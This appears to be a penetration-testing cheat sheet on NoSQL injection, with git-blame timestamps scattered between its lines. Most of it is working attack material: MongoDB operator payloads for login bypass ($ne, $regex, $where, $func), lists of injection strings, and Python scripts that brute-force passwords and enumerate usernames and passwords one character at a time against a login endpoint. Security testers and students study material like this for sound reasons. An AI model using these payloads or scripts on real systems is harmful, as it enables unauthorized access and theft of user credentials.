2020-07-15 15:43:14 +00:00
# NoSQL injection
NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax.
## Exploit
2021-10-18 11:21:18 +00:00
In PHP you can send an Array changing the sent parameter from _parameter=foo_ to _parameter\[arrName]=foo._
2020-07-15 15:43:14 +00:00
The exploits are based in adding an **Operator** :
```bash
username[$ne]=1$password[$ne]=1 #< Not Equals >
username[$regex]=^adm$password[$ne]=1 #Check a < regular expression > , could be used to brute-force a parameter
username[$regex]=.{25}& pass[$ne]=1 #Use the < regex > to find the length of a value
2021-04-19 22:42:22 +00:00
username[$eq]=admin& password[$ne]=1 #< Equals >
2020-07-15 15:43:14 +00:00
username[$ne]=admin& pass[$lt]=s #< Less than > , Brute-force pass[$lt] to find more users
username[$ne]=admin& pass[$gt]=s #< Greater Than >
username[$nin][admin]=admin& username[$nin][test]=test& pass[$ne]=7 #< Matches non of the values of the array > (not test and not admin)
{ $where: "this.credits == this.debits" }#< IF > , can be used to execute code
```
### Basic authentication bypass
2021-10-18 11:21:18 +00:00
**Using not equal ($ne) or greater ($gt)**
2020-07-15 15:43:14 +00:00
```bash
#in URL
username[$ne]=toto& password[$ne]=toto
2021-06-26 15:50:17 +00:00
username[$regex]=.*& password[$regex]=.*
2020-07-15 15:43:14 +00:00
username[$exists]=true& password[$exists]=true
#in JSON
{"username": {"$ne": null}, "password": {"$ne": null} }
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} }
{"username": {"$gt": undefined}, "password": {"$gt": undefined} }
```
### **SQL - Mongo**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
Normal sql: ' or 1=1-- -
Mongo sql: ' || 1==1// or ' || 1==1%00
```
### Extract **length** information
```bash
username[$ne]=toto& password[$regex]=.{1}
username[$ne]=toto& password[$regex]=.{3}
# True if the length equals 1,3...
```
### Extract **data** information
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
in URL (if length == 3)
username[$ne]=toto& password[$regex]=a.{2}
username[$ne]=toto& password[$regex]=b.{2}
...
username[$ne]=toto& password[$regex]=m.{2}
username[$ne]=toto& password[$regex]=md.{1}
username[$ne]=toto& password[$regex]=mdp
username[$ne]=toto& password[$regex]=m.*
username[$ne]=toto& password[$regex]=md.*
in JSON
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
```
### **SQL - Mongo**
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
/?search=admin' & & this.password%00 --> Check if the field password exists
/?search=admin' & & this.password & & this.password.match(/.*/)%00 --> start matching password
/?search=admin' & & this.password & & this.password.match(/^a.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^b.*$/)%00
/?search=admin' & & this.password & & this.password.match(/^c.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj.*$/)%00
...
/?search=admin' & & this.password & & this.password.match(/^duvj78i3u$/)%00 Found
```
2021-04-30 09:16:21 +00:00
### PHP Arbitrary Function Execution
2021-10-18 11:21:18 +00:00
Using the ** $func** operator of the [MongoLite ](https://github.com/agentejo/cockpit/tree/0.11.1/lib/MongoLite ) library (used by default) it might be possible to execute and arbitrary function as in [this report ](https://swarm.ptsecurity.com/rce-cockpit-cms/ ).
2021-04-30 09:16:21 +00:00
```python
"user":{"$func": "var_dump"}
```
2021-10-18 11:21:18 +00:00
![](< .. / . gitbook / assets / image ( 468 ) . png > )
2021-04-30 09:16:21 +00:00
2020-07-15 15:43:14 +00:00
## Blind NoSQL
```python
import requests, string
alphabet = string.ascii_lowercase + string.ascii_uppercase + string.digits + "_@{}-/()!\"$%=^[]:;"
flag = ""
for i in range(21):
print("[i] Looking for char number "+str(i+1))
for char in alphabet:
r = requests.get("http://chall.com?param=^"+flag+char)
if ("< TRUE > " in r.text):
flag += char
print("[+] Flag: "+flag)
break
```
```python
import requests
import urllib3
import string
import urllib
urllib3.disable_warnings()
username="admin"
password=""
while True:
for c in string.printable:
if c not in ['*','+','.','?','|']:
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
r = requests.post(u, data = {'ids': payload}, verify = False)
if 'OK' in r.text:
print("Found one more char : %s" % (password+c))
password += c
```
## MongoDB Payloads
2021-10-18 11:21:18 +00:00
```
2020-07-15 15:43:14 +00:00
true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' & & this.password.match(/.*/)//+%00
' & & this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
```
## Tools
* [https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration ](https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration )
## Brute-force login usernames and passwords from POST login
```python
import requests
import string
url = "http://example.com"
headers = {"Host": "exmaple.com"}
cookies = {"PHPSESSID": "s3gcsgtqre05bah2vt6tibq8lsdfk"}
possible_chars = list(string.ascii_letters) + list(string.digits) + ["\\"+c for c in string.punctuation+string.whitespace ]
def get_password(username):
print("Extracting password of "+username)
params = {"username":username, "password[$regex]":"", "login": "login"}
password = "^"
while True:
for c in possible_chars:
params["password[$regex]"] = password + c + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
password += c
break
if c == possible_chars[-1]:
print("Found password "+password[1:].replace("\\", "")+" for username "+username)
return password[1:].replace("\\", "")
def get_usernames():
usernames = []
params = {"username[$regex]":"", "password[$regex]":".*", "login": "login"}
for c in possible_chars:
username = "^" + c
params["username[$regex]"] = username + ".*"
pr = requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False)
if int(pr.status_code) == 302:
print("Found username starting with "+c)
while True:
for c2 in possible_chars:
params["username[$regex]"] = username + c2 + ".*"
if int(requests.post(url, data=params, headers=headers, cookies=cookies, verify=False, allow_redirects=False).status_code) == 302:
username += c2
print(username)
break
if c2 == possible_chars[-1]:
print("Found username: "+username[1:])
usernames.append(username[1:])
break
return usernames
for u in get_usernames():
get_password(u)
```
## References
2021-10-18 11:21:18 +00:00
{% file src="../.gitbook/assets/EN-NoSQL-No-injection-Ron-Shulman-Peleg-Bronshtein-1.pdf" %}
2020-07-15 15:43:14 +00:00
[https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20injection )